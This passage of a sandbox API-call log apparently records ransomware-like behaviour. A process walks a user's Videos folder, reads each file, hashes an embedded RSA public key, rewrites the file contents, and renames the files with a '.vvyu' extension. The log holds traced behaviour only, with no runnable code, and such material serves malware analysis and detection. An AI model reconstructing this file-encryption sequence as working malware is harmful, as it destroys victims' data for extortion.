Flags=0x0, Size=0x4) returned 0x2c78a40 [0202.185] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0202.185] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78af0 [0202.185] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b00 [0202.186] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea35f0 [0202.186] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78af0 | out: hHeap=0x620000) returned 1 [0202.186] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85d88 [0202.186] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0202.186] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea35c0 [0202.186] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b00 | out: hHeap=0x620000) returned 1 [0202.186] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3650 [0202.186] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0202.186] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a40 [0202.186] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0202.186] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3620 [0202.186] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0202.186] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3608 [0202.186] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0202.186] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3668 [0202.186] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3608 | out: hHeap=0x620000) returned 1 [0202.186] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3608 [0202.187] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3620 | out: hHeap=0x620000) returned 1 [0202.187] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a90 [0202.187] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a00 | out: hHeap=0x620000) returned 1 [0202.187] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d48 [0202.187] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0202.187] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x2e83750 [0202.187] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea35d8 | out: hHeap=0x620000) returned 1 [0202.187] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea35d8 [0202.187] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0202.187] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x2d08630 [0202.187] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3638 | out: hHeap=0x620000) returned 1 [0202.187] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99af8 [0202.187] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3668 | out: hHeap=0x620000) returned 1 [0202.187] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x2ea6a68 [0202.187] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83750 | out: hHeap=0x620000) returned 1 [0202.187] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x2c998c8 [0202.187] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0202.187] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99c10 [0202.187] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea35d8 | out: hHeap=0x620000) returned 1 [0202.188] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x2ea6c80 [0202.188] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0202.188] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95b88 [0202.188] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0202.189] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c300 | out: hHeap=0x620000) returned 1 [0202.189] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e960b0 | out: hHeap=0x620000) returned 1 [0202.189] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95b88 | out: hHeap=0x620000) returned 1 [0202.189] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d48 | out: hHeap=0x620000) returned 1 [0202.190] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0202.190] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0202.190] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6c80 | out: hHeap=0x620000) returned 1 [0202.191] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0202.191] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0202.191] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3608 | out: hHeap=0x620000) returned 1 [0202.191] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0202.191] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3650 | out: hHeap=0x620000) returned 1 [0202.191] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0202.191] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea35f0 | out: hHeap=0x620000) returned 1 [0202.191] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea35c0 | out: hHeap=0x620000) returned 1 [0202.191] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e96a80 | out: hHeap=0x620000) returned 1 [0202.192] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0202.192] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95fa8 | out: hHeap=0x620000) returned 1 [0202.192] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea35a8 | out: hHeap=0x620000) returned 1 [0202.192] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e901e8 | out: hHeap=0x620000) returned 1 [0202.193] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d08630 | out: hHeap=0x620000) returned 1 [0202.193] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95d98 | out: hHeap=0x620000) returned 1 [0202.193] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa80 | out: hHeap=0x620000) returned 1 [0202.194] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99d28 | out: hHeap=0x620000) returned 1 [0202.194] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85dc8 | out: hHeap=0x620000) returned 1 [0202.194] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0202.194] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85ac8 | out: hHeap=0x620000) returned 1 [0202.194] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a5b0 | out: hHeap=0x620000) returned 1 [0202.194] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0c3c8 | out: hHeap=0x620000) returned 1 [0202.195] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0202.195] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0d410 | out: hHeap=0x620000) returned 1 [0202.195] WriteFile (in: hFile=0x510, lpBuffer=0x2ea99b0*, nNumberOfBytesToWrite=0x89b1, lpNumberOfBytesWritten=0x312fb14, lpOverlapped=0x0 | out: lpBuffer=0x2ea99b0*, lpNumberOfBytesWritten=0x312fb14*=0x89b1, lpOverlapped=0x0) returned 1 [0202.196] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea99b0 | out: hHeap=0x620000) returned 1 [0202.196] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x89b6, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0202.196] WriteFile (in: hFile=0x510, lpBuffer=0x2e95ea0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2e95ea0*, lpNumberOfBytesWritten=0x312fb50*=0x100, lpOverlapped=0x0) returned 1 [0202.196] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95ea0 | out: hHeap=0x620000) returned 1 [0202.196] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0202.196] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x2ea6a68 [0202.196] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2ea6a68, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0202.197] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x2ea6e98 [0202.197] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0202.197] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0202.197] WriteFile (in: hFile=0x510, lpBuffer=0x2ea6e98*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ea6e98*, lpNumberOfBytesWritten=0x312fb50*=0x28, lpOverlapped=0x0) returned 1 [0202.198] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6e98 | out: hHeap=0x620000) returned 1 [0202.198] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0202.198] WriteFile (in: hFile=0x510, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x312fb50*=0x26, lpOverlapped=0x0) returned 1 [0202.198] CloseHandle (hObject=0x510) returned 1 [0202.199] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e915e0 [0202.199] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8a0) returned 0x2ea6a68 [0202.200] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e915e0 | out: hHeap=0x620000) returned 1 [0202.200] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Videos\\z2E0zT\\vtiS4AAZ_oK\\Asv9iqUaFA9rCWFze77.avi" (normalized: "c:\\users\\keecfmwgj\\videos\\z2e0zt\\vtis4aaz_ok\\asv9iquafa9rcwfze77.avi"), lpNewFileName="C:\\Users\\kEecfMwgj\\Videos\\z2E0zT\\vtiS4AAZ_oK\\Asv9iqUaFA9rCWFze77.avi.vvyu" (normalized: "c:\\users\\keecfmwgj\\videos\\z2e0zt\\vtis4aaz_ok\\asv9iquafa9rcwfze77.avi.vvyu")) returned 1 [0202.201] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0202.202] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd96b8 | out: hHeap=0x620000) returned 1 [0202.203] VirtualFree (lpAddress=0x2900000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0202.206] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e91678 | out: hHeap=0x620000) returned 1 [0202.206] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x59554d50, ftCreationTime.dwHighDateTime=0x1d8a075, ftLastAccessTime.dwLowDateTime=0x52a5f480, ftLastAccessTime.dwHighDateTime=0x1d8a22f, ftLastWriteTime.dwLowDateTime=0x52a5f480, ftLastWriteTime.dwHighDateTime=0x1d8a22f, nFileSizeHigh=0x0, nFileSizeLow=0xaaa5, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="B8Gbt7KNns9kT-gvh.swf", cAlternateFileName="B8GBT7~1.SWF")) returned 1 [0202.206] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0202.206] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e91678 [0202.207] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0202.207] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Videos\\z2E0zT\\vtiS4AAZ_oK\\B8Gbt7KNns9kT-gvh.swf") returned=".swf" [0202.207] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Videos\\z2E0zT\\vtiS4AAZ_oK\\B8Gbt7KNns9kT-gvh.swf" (normalized: "c:\\users\\keecfmwgj\\videos\\z2e0zt\\vtis4aaz_ok\\b8gbt7knns9kt-gvh.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x510 [0202.208] GetFileSizeEx (in: hFile=0x510, lpFileSize=0x312fb40 | out: lpFileSize=0x312fb40*=43685) returned 1 [0202.208] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2900000 [0202.210] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0xaa7f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0202.211] ReadFile (in: hFile=0x510, lpBuffer=0x2900000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x312fb78, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb78*=0x26, lpOverlapped=0x0) returned 1 [0202.226] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd96b8 [0202.227] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd96b8 | out: hHeap=0x620000) returned 1 [0202.227] SetFilePointer (in: hFile=0x510, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0202.227] ReadFile (in: hFile=0x510, lpBuffer=0x2900000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x312fb70, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb70*=0xaaa5, lpOverlapped=0x0) returned 1 [0202.229] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0202.229] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f1) returned 0x2d0c3c8 [0202.229] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0202.229] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0202.229] CryptAcquireContextW (in: phProv=0x312fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x312fa50*=0x67c300) returned 1 [0202.231] CryptCreateHash (in: hProv=0x67c300, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x312fa58 | out: phHash=0x312fa58) returned 1 [0202.231] CryptHashData (hHash=0x2cfe1c0, pbData=0x2d0c3c8, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0202.231] CryptGetHashParam (in: hHash=0x2cfe1c0, dwParam=0x2, pbData=0x0, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x312fa54) returned 1 [0202.232] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x2c85dc8 [0202.232] CryptGetHashParam (in: hHash=0x2cfe1c0, dwParam=0x2, pbData=0x2c85dc8, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x2c85dc8, pdwDataLen=0x312fa54) returned 1 [0202.232] GetLastError () returned 0x0 [0202.232] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83750 [0202.232] GetLastError () returned 0x0 [0202.232] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd96b8 [0202.233] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83750 | out: hHeap=0x620000) returned 1 [0202.233] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85dc8 | out: hHeap=0x620000) returned 1 [0202.233] CryptDestroyHash (hHash=0x2cfe1c0) returned 1 [0202.233] CryptReleaseContext (hProv=0x67c300, dwFlags=0x0) returned 1 [0202.233] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0c3c8 | out: hHeap=0x620000) returned 1 [0202.233] UuidCreate (in: Uuid=0x312fa48 | out: Uuid=0x312fa48) returned 0x0 [0202.233] UuidToStringA (in: Uuid=0x312fa48, StringUuid=0x312fa40 | out: StringUuid=0x312fa40) returned 0x0 [0202.233] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0202.233] RpcStringFreeA (in: String=0x312fa40 | out: String=0x312fa40) returned 0x0 [0202.234] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd96b8 | out: hHeap=0x620000) returned 1 [0202.234] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd96b8 [0202.234] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xaab0) returned 0x2ea99b0 [0202.234] SetFilePointer (in: hFile=0x510, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0202.235] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0202.235] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0d410 [0202.235] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0202.235] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0c3c8 [0202.235] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a5b0 [0202.235] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e901e8 [0202.235] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea35a8 [0202.235] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e90230 [0202.235] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea35c0 [0202.235] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea35f0 [0202.235] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3650 [0202.235] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3608 [0202.236] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x2cff270 [0202.236] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x2e98a80 [0202.236] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x2e98a80, Size=0x218) returned 0x2e9aa80 [0202.236] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x2ea6a68 [0202.236] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea35f0 | out: hHeap=0x620000) returned 1 [0202.236] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3608 | out: hHeap=0x620000) returned 1 [0202.236] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3650 | out: hHeap=0x620000) returned 1 [0202.236] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cff270 | out: hHeap=0x620000) returned 1 [0202.237] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0202.237] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3650 [0202.237] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a30 [0202.237] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3608 [0202.237] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85ac8 [0202.237] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x2ea35f0 [0202.237] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ac0 [0202.237] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x2c99d28 [0202.237] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83750 [0202.237] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a610 [0202.237] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85dc8 [0202.237] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x2c998c8 [0202.237] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d88 [0202.237] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ab0 [0202.238] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99d28 | out: hHeap=0x620000) returned 1 [0202.238] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3608 | out: hHeap=0x620000) returned 1 [0202.238] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0202.238] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea35f0 | out: hHeap=0x620000) returned 1 [0202.238] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85ac8 | out: hHeap=0x620000) returned 1 [0202.238] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0202.238] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3650 | out: hHeap=0x620000) returned 1 [0202.238] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83750 | out: hHeap=0x620000) returned 1 [0202.239] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a5b0 | out: hHeap=0x620000) returned 1 [0202.239] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9aa80 | out: hHeap=0x620000) returned 1 [0202.239] GetCurrentThreadId () returned 0x66c [0202.239] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95ea0 [0202.239] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x2ea90d8 [0202.239] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x2cd9648 [0202.239] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c300 [0202.239] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x2e96a80 [0202.239] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0202.239] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0202.239] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95d98 [0202.239] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0202.240] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0202.240] GetCurrentThreadId () returned 0x66c [0202.240] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0202.240] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0202.240] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x2c73318 [0202.240] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0202.241] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0202.241] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0202.241] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 